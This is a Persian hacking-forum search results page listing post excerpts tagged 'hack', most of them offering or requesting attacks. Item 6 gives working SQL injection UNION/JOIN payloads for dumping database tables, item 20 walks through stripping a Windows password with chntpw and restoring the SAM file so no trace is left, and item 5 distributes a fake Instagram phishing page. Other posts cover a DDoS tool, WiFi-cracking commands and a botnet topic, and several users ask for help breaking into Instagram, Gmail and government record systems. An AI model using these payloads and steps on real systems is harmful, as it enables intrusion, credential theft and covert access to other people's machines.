رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'هک'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.

  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد

جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان

آخرین بروزرسانی

  • شروع

    پایان

فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان

گروه

About Me

154 نتیجه پیدا شد

  1. mownten
    با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  2. Hibrain
    من هیچ تجربه ای تو نه هک و نه برنامه نویسی ندارم سوالی که از دوستان دارم اینکه میشه از طریق وای فای یه سیستم رو هک کرد؟ مثلا توی خدماتی نشستی یه مودم اونجا نصب کنی و هر کدوم از اون کارمندا وصل بشن بهش تو از اون طریق سیستمش رو هک کنی؟ البته اینو از تو فیلم دیدم ولی احتمالا ممکنه کسی میدونه یه توضیح بده
  3. Hibrain
    اساتید و دوستان خبره بنظرتون میشه به اطلاعات محرمانه و شخصی افراد با داشتن یه سری اطلاعات جزیی دست پیدا کرد!؟ 1. مثلا تمام ثبت احوال دسترسی کامل به اطلاعات شخصیمون دارن 2. تمام مخابرات و خدماتی ها با داشتن شماره و یا کدملی میتونن به اطلاعات ما دست پیدا کنن 3. یا کلانتری ها یا دادگستری و.. میتونن سابقه مارو پیدا کنن و سوال اینه ایا میشه و چجوری میشه این مکان هارو هک کرد تا بشه به اطلاعات شخصی افراد با داشتن شمارشون. کدملیشون. و... دست پیدا کرد!!!؟
  4. MR.MSA

    آموزش ابزار Hammer

    MR.MSA پاسخی ارسال کرد برای یک موضوع در ابزار حملات Dos & DDOS

    با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  5. MR.MSA

    پیج فیک اینستاگرام

    MR.MSA پاسخی ارسال کرد برای یک موضوع در HTML

    با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
  6. MR.MSA

    نکته مهم در متد join

    MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  7. themosiw

    آموزش ساخت ویروس براحتی

    themosiw پاسخی ارسال کرد برای یک موضوع در ویروس

    داشتم فایلامو میگشتم ب ی اموز باحال برخوردم گفتم واستون بزارم شاید ب درد بخوره اینجا میخوام نوشتن یه ویروس کوچولو رو با هم کار کنیم البته آنتی ویروسش هم همینجاس: مثل من مراحل زیر رو یکی یکی انجام بدین : 1- یک فایل متنی مثل notpad باز کنید سپس دستور روبرو رو توی اون تایپ کنید Attrib +h +s +r 2- فایل رو با پسوند bat ذخیره کنید . 3- به همین راحتی شما الان یه ویروس نوشتید که اونو توی هر فولدری اجرا کنید فایلهای موجود رو مخفی می کنه که حتی با گذاشتن تیک show hidden file در tools----option نیز فایلها نمایش داده نمیشن . شما قابلیت های بیشتری هم برای این ویروس می تونید در نظر بگیرید مثل اینکه آدرس مسیر مورد نظرتون رو جلوی دستور Attrib +h +s +r بنویسید تا فقط همون مسیر ویروسی شه . 4- برای پاک کردن اثر ویروس میتونید همون مراحل 1 و 2 و 3 رو انجام بدین اینبار با این دستور Attrib -h -s -r که می یاد خواص سوئیچهای دستور مذکور را بر می دارد . یه نکته مهم که اینجا باید یاد آور شم اینه : هر وقت دیدید فایلها یا پوشه هاتون مخفی شدن یا شاید با تصور اشتباه پاک شده باشند فقط کافیه روی پوشه یا درایو مربوط کلیک راست کرده و در prorerties آن حجم فولدر و تعداد فایلهای آنرا ببینید تا از پاک کردن نا خود آگاه آنها جلوگیری شود . حالا یک سری خواص دستور attrib رو برای دوستانی که به این مطلب علاقه دارند میذارم : دستور Attrib: برای نسبت دادن خصیصه های فقط خواندنی، مخفی، آرشیو و سیستمی به فایل یا فولدر استفاده میشه. که دارای سوئیچ های : + برای قرار دادن خصیصه - برای پاک کردن خصیصه S برای سیستمی کردن فایل یا فولدر A برای آرشیو کردن فایل یا فولدر H برای مخفی کردن فایل یا فولدر R برای فقط خواندنی کردن فایل یا فولدر و دو سوئیچ فوق العاده زیر D برای پردازش فولدرها S برای تعیین صفت خاصه به تمامی فایل ها و ساب فولدر های موجود
  8. backpack

    همه چیز در مورد دارک وب + لینک ورود

    backpack پاسخی ارسال کرد برای یک موضوع در بحث آزاد

    دارک وب چیست؟ دارک وب شبکه ای بزرگ و مخفی است که شاید 10 درصد افراد این انجمن از وجود آن بی خبر باشند. دلیل نام گذاری این شبکه به دارک وب به دلیل پنهانی و ناشناخته بودن آن است. تمام افرادی که از این شبکه مخفی استفاده می کنند به دلیل امنیت بی نظیر آن است که به صورت آنلاین و از پسورد های و پسورد های محافظت شده ان است، البته باید این هم بگویم که استفاده از این شبکه کار راحتی نیست و باید از چندین (پی وال) گذشت و از نرم افزار های به خصوصی استفاده کرد.طبق تحقیقاتی که توسط نشریه Nature به چاپ رسیده است گوگل قادر به ایندکس دارک وب و ردیابی آن نیست و تنها 0.03 درصد از همه اطلاعات آن در گوگل جست و جو می شود. در دارک وب چه کار هایی انجام می شود؟ 1. خرید و فروش مواد مخدر تاجران مواد مخدر و حتی افراد عادی در این شبکه می توانند به راحتی انواع موارد مخدر را تبادل کنند. بیشتر فروشندگان چینی از طریق این شبکه در طول 2 سال توانستند از طریق فروش مورد مخدر در دارک وب 200 میلیون دلار درامد داشته باشند!! 2.ارز های تقلبی و جعلی در دارک وب همه ارز ها از جمله یورو، پوند، ین و دلار در حال تبادل است و می توان ارز های تقلبی را از طریق این شبکه خرید و فروش کرد. 3. تهیه مدارک جعلی داخل این شبکه به راحتی می توان تمام مدارک مهم از جمله پاسپورت، شناسنامه، گواهینامه رانندگی، انواع مدارک شهروندی، کارت های شناسایی، مدارک دانشگاهی، مدارک مهاجرتی و حتی کارت های شناسایی دیپلماتیک را تهیه کرد! به عنوان مثال حالا که من این مقاله را می نویسم برای جعل یک پاسپورت امریکایی باید 500 دلار خرج کرد!! 4. اسلحه، مهمات اسلحه و موارد منفجره اسلحه هایی مانند کلت کمری و مواد منفجره مثل نارنجک را مثل آب خورد می توان خریداری کرد! اما شاید باورتان نشود ولی اسلحه هایی مانند DSR-Precision یا XM307 ACSW را می توان خریداری کرد اما اگر بخواهید همچین اسلحه هایی را بخرید باید پول یک خودرو را هزینه کنید، البته این مهمات را در اسباب بازی ها یا عروسک های بزرگ قرار می دهند و آن ها را با چیز هایی می پوشانند که اشعه ایکس نتواند آن ها را شناسایی کند. 5. قتل! (murder) در دارک وب می توانید برای خود یک قاتل حرفه ای استخدام کنید تا بتواند برای شما به صورت غیر قانونی و ..... افرادی را به قتل برسانند، اما نگران نباشید چون این آپشن توی ایران فعال نیست و در ایران قاتلی استخدام نمیشه(لااقل من ندیدم). اما در کشور هایی مانند امریکا و انگلیس هم که این قاتل ها برای قتل افرادی مثل رئیس جمهور و نخست وزیر ها استخدام نمی شوند. 6. اعضای بدن وقتی که افراد واقعا نیازمند به اعضایی مثل کلیه یا قلب پیدا می کنند دست به این اقدام و وحشتناک می زنند و افرادی هم اعضای بدن انسان ها را قاچاق می کنند تا بتوانند این کار را انجام بدهند. الان قیمت قلب 200هزار دلار، کلیه 220هزار دلار، کبد 170هزار دلار و یک جفت چشم کامل 1700هزار دلار به فروش می رود. 7. اتاق قرمز (Red Room) این بخش از دارک وب، بخش وحشیانه ایه! ممکنه افرادی پول بگیرند و بیان کسی رو بگیرن و تا میخوره بزننش تا بمیره!! افرادی هم برای خوش گذرانی، کودکان و افراد دیگر را شکنجه یا اذیت می کنند و در دارک وب ویدیو ها را می فروشند و افراد احمقی اقدام به خریداری آن می کنند. البته جرایم اینترنتی و فایل های غیرقانونی زیادی در دارک وب وجود دارد که دیگه فقط نام می برم و توضیحی در موردشون نمی دهم و فقط نام می برم: 1. پول رمز نگاری شده 2. خدمات میزبانی وب 3. خدمات ابری 4. جُرم افزار 5. استخدام هکر 6.مراکز تماس جرایم مختلف چگونه وارد دارک وب شویم؟ برای ورود به دارک وب نمی توان از مرورگر های عادی استفاده کرد. شما باید از مرورگر Tor یا همان the Onion Router استفاده کنید و برای امنیت بیشتر همراه با Tor از یک VPN هم استفاده کنید تا امنیت شما بی نقص شود. برخی از سایت های دارک وب عبارتند از: (با توجه به بعضی قوانین، لینک های خطرناک گذاشته نمیشه) 1. The Hidden Wiki 2. ProPublica 3. SoylentNews 4. Keybase لینک های معتبر دارک وب همواره در حال تغییر هستند.(به علت احتمال شناسایی) موفق باشید🌹
  9. alimohamadzadeh
    یه پیج اینستا هستش که هرکار کردم نتونستم کرک کنم هم با ترموکس تلاش کردم هم با sentry mba چون رشتم کامپیوتر نیستش خیلی برام سخت بود و با تمام تلاشی که کردم اما نشد اگه کسی می تونه کمکم کنه ممنون میشم همینجا یا تو تلگرام بهم پیام بده آیدی ******@
  10. Conqueror_Boy
    سلام دوستان عزیز. میخواستم بپرسم بهترین راه برای کرک جیمیل چه روشی هست +آموزش ممنون.
  11. mr_locker
    به نام آفریننده هستی MR.locker هستم با آموزشی دیگه در خدمت شمام امروز میخوام آموزش کار با اسکنر rapidscan رو یاد بدم. قبل هر چیز توضیحی بدم درباره این اسکنر این اسکنر بسیار اسکنر قدرتمندیه به این دلیل که کار این اسکنر به این صورته که از دیگر اسکنر های قدرتمند برای جست و جوی باگ استفاده میکنه و به جرعت میتونم بگم که خیلی قدرتمنده و فقط تنها ایرادی که داره سرعت نصبتا پایینشه ولی به چشم نمیاد. اول از همه از گیتهاب کلونش میکنیم با دستور [Hidden Content] و بعد از کلون شدن با زدن دستور cd rapidscan وارد پوشه ابزار میشیم پس از وارد شدن به پوشه ابزار دستور python rapidscan.py رو میزنیم و جلوی اون سایتی که میخواییم اسکن شه رو میزاریم مثل python rapidscan.py target.com تا آموزش بعدی یا حق
  12. alizombie

    اموزش 0 تا 100 کالی لینوکس

    alizombie پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    با سلام خدمت شما دوستان گرامی بعد از این که متوجه ی این شدم که اموزش های سیستم عامل کالی لینوکس در انجمن دیگر گذاشته نمیشود و دوستان میخواهند که اموزش هارو از صفر یاد بگیرن بنا به این شدم که دست به کار بشم و با کمک دوستان عزیز در انجمن اگر نواقصی دیدن در تاپیک ها کمک کنن تا بر طرف بشه..... دوستان تازه کار و مدیران شبکه و حتی یا وبمستران هم میتوانند از این اموزش ها برای محک زدن امنیت سایت خود استفاده کنند و در صورت مشاهده ی نقطه ی ضعف انرا بر طرف کنند.لطفا از اموزش ها برای افزایش امنیت سایت های خودتون استفاده کنید تا کمتر شاهد هک شدن سایت های ایرانی باشیم. در صورت نیاز به مشاوره و کمک جدی میتونید به صورت پیام خصوصی با ما در تماس باشید. قوانین تاپیک: اسپم ممنوع(دوستان عزیز چون خود اموزش ها طولانی هست لطف کنین و اسپم ندید در صورت مشاهده با کاربربرخورد میشه) ((سوالات خودتون رو درلینک زیر بپرسین تا به انها خودم و یا دیگر مدیران جواب بدن)) [Hidden Content] از قرار دادن اموزش های تکراری پرهیز کنین در صورت گذاشتن ابزاری خاص لینک اسکن فراموش نشود با تشکر فراوان از شما دوستان گرامی
  13. MjokerJ
    سلام خدمت همه اساتید بزرگوار. ببخشید عرضی داشتم من میخوام اکانت ادمین یه چت روم رو هک کنم در واقع یوزر و پسوردشو بدست بیارم اما نمی دونم چجوری. لطفا هرکی هرچی میدونه یه کمک کوچک به ما بکنه
  14. HRMBHH

    مخفی کردن لینک

    HRMBHH پاسخی ارسال کرد برای یک موضوع در سوال و جواب های شبکه

    سلام دوستان من یه لینک دارم که خیلی واضح هستش که لینک فیک و درواقع تقلبی هستش. مثلا : [Hidden Content] حالا میخوام این لینک رو که قراره برای قربانی ارسال بشه داخل یه لینکی مثلا آدرس سایت اینستا پنهان کنم ولی شخص با کلیک روی اون ، لینک من رو اجرا کرده باشه... اگه امکانش هست بگید چنین چیزی میشه؟ و اگه میشه توضیح بدید چجوری ممنون میشم... ممنون
  15. Goodzilam
    درود, آموزش دیفیس(هک) وبسایت با کمک افزونه Noredirect در فایرفاکس سوالی هست زیر همین تاپیک جواب میدم امیدوارم مفید باشه و در راه آموزش استفاده شه! پسورد : guardiran.org Goodzilam.part1.rar Goodzilam.part2.rar
  16. nimaig
    Account Checker Instagram اکانت چیکر اینستاگرام میخواستم ممنون میشم برام بفرستین حتماً کار کنه و سالم باشه، ویروسی هم نباشه بهتره اگه کار کنه یه هدیه براتون دارم ( هک و اینچیزا نیست )
  17. 1TED
    بسم الله الرحمن الرحیم درود ../ آموزش کار با ابزار جدید nullsecurity تحت عنوان lulzbuster در خدمت شما دوستان عزیز هستیم کار ابزار اسکن دایرکتوری های مختلف و همچنین فایل های خاص یک وبسایت هست که بسیار سریع و کم حجم هست میتونید با این ابزار یک اسکن جامع روی تارگت مورد نظر خودتون داشته باشید ( برای پیدا کردن ادمین پیج بسیار موثر هست ) کار با ابزار بسیار ساده هست و هدف صرفا معرفی ابزار هستش ابزار و فیلم آموزش نصب و استفاده پیوست میشه ../ یا حق ../ lulzbuster.zip lulzbuster-1.0.0.tar.xz
  18. cloner2543

    آسیب پذیری جدید در php

    cloner2543 پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    بچه ها این آسیب‌پذیری با شماره CVE-۲۰۱۹-۱۱۰۴۳ ردیابی میشه و به مهاجمان اجازه میده تا با دسترسی به یک URL ساخته شده، دستوراتی را روی سرورها اجرا کنن. بهره‌برداری از این آسیب‌پذیری به سادگی انجام میشه و کد اثبات مفهومی (PoC) اون به صورت عمومی توی گیت‌هاب منتشر شده و در دسترس همه هست اسکریپت PoC موجود در گیت‌هاب می‌تونه از طریق وب سرور مورد نظر، وجود آسیب‌پذیری رو بررسی کنه و وقتی که یک هدف آسیب‌پذیر شناسایی بشه، مهاجم میتونه به سرور وب آسیب‌پذیر، درخواست دستکاری شده ارسال کنه البته همه سرورهای مبتنی بر PHP تحت تأثیر قرار نمی‌گیرن و فقط سرورهای NGINX که ویژگی PHP-FPM اونا فعال باشه آسیب‌پذیر هستن
  19. C0d3!Nj3ct!0n

    کرکر وای فای ( wifi penetration testing tools )

    C0d3!Nj3ct!0n پاسخی ارسال کرد برای یک موضوع در ابزار کرک

    در اینجا به معرفی یکی از بهترین ابزار هک یا تست نفوذ وایفای ( wifi penetration testing ) میپردازیم. برخی از ویژگی های این ابزار عبارتند از : اهداف را به ترتیب قدرت سیگنال در db مرتب میکند فیلتر های متنوع برای نوع حمله ( Wpa / wep / هر دو / بالاترین قدرت سیگنال / کانال ها و...) ویژگی ناشناس ( قبل از حمله MAC را به یک ادرس تصادفی تغییر میدهد و بعد از اتمام حمله به حالت اولیه بازگردانی میکند) توقف حمله با ctrl+c همراه با گزینه ادامه , تارگت بعدی, خروج و ... تصدیق هویت هوشمند WPA و... دستورات ( commands ) این ابزار : COMMANDS -check <file> check capfile <file> for handshakes. -cracked display previously-cracked access points GLOBAL -all attack all targets. [off] -i <iface> wireless interface for capturing [auto] -mac anonymize mac address [off] -c <channel> channel to scan for targets [auto] -e <essid> target a specific access point by ssid (name) [ask] -b <bssid> target a specific access point by bssid (mac) [auto] -showb display target BSSIDs after scan [off] -pow <db> attacks any targets with signal strenghth > db [0] -quiet do not print list of APs during scan [off] WPA -wpa only target WPA networks (works with -wps -wep) [off] -wpat <sec> time to wait for WPA attack to complete (seconds) [500] -wpadt <sec> time to wait between sending deauth packets (sec) [10] -strip strip handshake using tshark or pyrit [off] -crack <dic> crack WPA handshakes using <dic> wordlist file [off] -dict <file> specify dictionary to use when cracking WPA [phpbb.txt] -aircrack verify handshake using aircrack [on] -pyrit verify handshake using pyrit [off] -tshark verify handshake using tshark [on] -cowpatty verify handshake using cowpatty [off] WEP -wep only target WEP networks [off] -pps <num> set the number of packets per second to inject [600] -wept <sec> sec to wait for each attack, 0 implies endless [600] -chopchop use chopchop attack [on] -arpreplay use arpreplay attack [on] -fragment use fragmentation attack [on] -caffelatte use caffe-latte attack [on] -p0841 use -p0841 attack [on] -hirte use hirte (cfrag) attack [on] -nofakeauth stop attack if fake authentication fails [off] -wepca <n> start cracking when number of ivs surpass n [10000] -wepsave save a copy of .cap files to this directory [off] WPS -wps only target WPS networks [off] -wpst <sec> max wait for new retry before giving up (0: never) [660] -wpsratio <per> min ratio of successful PIN attempts/total tries [0] -wpsretry <num> max number of retries for same PIN before giving up [0] EXAMPLE ./wifite.py -wps -wep -c 6 -pps 600 توجه: در صورت استفاده این ابزار در ویندوز نیاز به نصب پایتون خواهید داشت. دانلود فایل پسورد: guardiran.org wifite-2.0r85.zip
  20. Mr.Bl4cK
    با یاد خدا در این پست یاد میگیریم که چگونه پسورد ویندوز رو از بین ببریم ( یا به بقیه یوزر های ویندوز دسترسی ادمین بدیم یا ... ) و اون هم زیر 3دقیقه (شاید از نظر شما زمان کمی باشه اما واسه کسی که دزدکی پشت ی سیستم نشسته زمان زیادیه ..) مواد لازم: 1. ویندوز قفل شده (7 یا 8 یا 8.1 یا 10 هیچ فرقی نمیکنه) 2. لینوکس لایو ( من نسخه کالی2019.2 رو دارم) شرح کلی کار: وقتی یواس بی رو بوت کنیم و لایو بالا بیاریم به فایل های داخل پی سی دسترسی کامل میگیریم //بدون محدودیت های ویندوزی سپس فایلی که یوزر و پسورد رو داره به وسیله ابزار chntpw ویرایش میکنیم آموزش قدم به قدم: پس از بوت کالی، فایل منیجر رو باز میکنیم روی Other Locations کلیک می کنیم //سمت چپ پایین درایو ویندوز رو انتخواب می کنیم سپس ترمینال رو در اونجا باز می کنیم //در ادامه دستورات ترمینال رو می زنیم cd Windows/System32/config chntpw وقتی اینتر بزنید صفحه کمک برنامه به صورت پیش فرض باز میشه -l List of Users -u <user> Select Username or RID for edit -i Interactive menu system که من مهم هاشو بالا نوشتم نکته جا افتاده: فایلی که ما روی اون کار میکنیم SAM نام دارد خب حالا اگ دستور chntpw -l SAM رو بزنیم لیست یوزر های سیو داخل فایل رو همراه با RID نشون میده در اونجا نشون میده که کدام یوزر ها فعال هستند / کدام ادمین هستند و .. و بعد وقتی یوزر خاص خودمون رو پیدا کردیم، دستور chntpw -u <user> SAM رو اجرا میکنیم توی این صفحه (که مربوط به یوزر انتخوابی خودمون است) ، نام کاربری / نام و نام خوانوادگی / دسترسی و لوگین های موفق و ناموفق این یوزر رو نشان می دهد و 5 شماره و حرف Q رو میبینیم شماره 1 : تغییر پسورد یوزر به NULL //یعنی در صفحه پسورد بدون وارد کردن رمز اینتر بزنید باز میشه شماره 2 : پسورد رو به صورت کامل حذف میکنه و اگر اکانتی قفل باشه بازش میکنه شماره 3 : دسترسی یوزر رو تا ادمین افزایش میده شماره 4 و 5 هم تا حالا واسه ما کاربرد نداشته وقتی گزینه خودتون رو زدید حالا میتونید Q رو وارد کنین و پس از سیو کردن فایل کامپیوتر را ری استارت کنید و از ویندوز بازشده لذت ببرید نکته های خیلی مهم: 1. وقتی میخواین این کار رو بکنین حتما از فایل SAM کپی داشته باشید تا بعد از نفوذتون ریپلیس کنین و ردی از خودتون بجا نگذارید(منظور اینکه طرف نفهمه کسی رفته تو کامپیوترش) 2. برای افزایش سرعت ریمو پسورد از کد chntpw -i SAM استفاده کنین. نکته های انحرافی: دلیل استفاده من از کالی این بود که این ابزار به صورت پیش فرض روش هست اما روی فدورا یا اوبونتو ندیدمش و باید نصبش میکردم خطایابی: اگر روی سیستم عامل کالی تست میکردید و به هر دلیلی نشد باید وقتی کالی رو بوت میکنین گذینه Live forensics رو اجرا کنین و اما روشهای مقابله: خودتون یکمی فکر کنین و ببینین مشکل از کجاست و راه حل خودتون چیه من خودم فردا طرفای اذان صبح شیوه مقابله با این رو منتشر میکنم یا علی
  21. Mr.Nashena3

    آموزش کامل ‌فایروال ‌Pfsense

    Mr.Nashena3 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    آموزش کامل ‌فایروال ‌Pfsense با سلام از اونجایی که وقت تایپ زیاد ندارم این که این فایر وال چی هست و .. رو ارجاع میدم به منابع دیگه و میریم سراغ آموزش چند نکته که باید بگم ۱. این فایر وال نیاز به یک سخت افزار قوی نداره پس برای استفاده در خانه هم مفید هست ۲. آموزش رایگان این فایروال رو من در سایت های ایرانی ندیدم ۳. شرکت های بزرگی مثل اپل از این فایروال استفاده میکنند ۴. در این تایپیک اسپم ممنوع و سوالات خود را در تایپیک جدا مطرح کنید ۵. از صبر شما مچکرم ۶. برای تشکر از دکمه تشکر اسفاده کنید ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Pfsense چیست؟ Pfsense یک فایروال نرم افزاری opensource می باشد که بر پایه FreeBSD ساخته شده. میتوانید از آن به عنوان یک فایروال/ روتر استفاده نمایید و روتر اختصاصی شبکه خود را داشته باشید. در رابطه با تاریخچه ایجاد pfsense، پروژه pfsense در سال 2004 آغاز شد و اولین انتشار آن در سال 2006 بود. ویژگی های pfsense :می توانید برای فیلتر کردن IP های مبدا و مقصد بسته ها و همچنین پورت های udp و tcp از آن استفاده کنید محدود کردن تعداد connection ها بر اساس rule ها مختلف ابزار های رمز نگاری پیشرفته برای سیستم عامل و شبکه مسدود سازی و اعمال محدودیت برای سرور ها و سیستم ها بر اساس نوع سیستم عامل (برای مثال اگر بخواهید سرور های لینوکسی به اینترنت دسترسی داشته باشند و سرور های ویندوزی دسترسی به اینترنت نداشته باشد بر اساس نوع سیستم عامل می توانید برای آنها اعلام وضعیت کنید ) می توانید ترافیک ها را بر اساس نوع آنها مدیریت نمایید و برای آن ها محدودیت قاعل شوید قابلیت نرمالسازی ترافیک را دارید می توانید قابلیت فیلترینگ را به صورت کامل خاموش نمایید تا سرور شما به یک روتر ساده تبدیل شود قابلیت فیلترینگ برای لایه 2 و لایه 3 در pfsense وجود دارد می توانید حتی در لایه application نیز محدودیت هایی برای کاربران قرار دهید وجود سیستم nating برای انجام nat در pfsense قابلیت پیکربندی همزمان دو فایروال در شبکه را داراست و امکان استفاده از HA یا همان قابلیت دسترسی بالا وجود دارد. به این صورت که هر دو فایروال به صورت خودکار قابلیت تعامل با یکدیگر را دارند و در صورت از دسترس خارج شدن یکی از آنها دیگری می تواند خدمات ارائه دهد می توانید از pfsense به عنوان یک سرور مانیتورینگ برای سخت افزار و وضعیت بسته ها نیز استفاده نمایید منبع : server.ir
  22. goodbeach

    هک شدن جیمیل و بازگردانی

    goodbeach پاسخی ارسال کرد برای یک موضوع در پرسش و پاسخ

    سلام دوستان به اصطلاح خودمون ، کاملا به فنا رفتم،، پسورد جیمیلم ک تمامی اطلاعاتم تو اون بود یادم رفت، البته حس میکنم هک شده( مطمئنم هک شده ) ، اگه کسی میتونه کمکم کنه لطفا دریغ نکنه، تمامی اطلاعات شخصیم تو اون و drive بود
  23. 1TED

    تاپیک جامع ابزار بات نت (Botnet)

    1TED پاسخی ارسال کرد برای یک موضوع در تروجان و کیلاگر

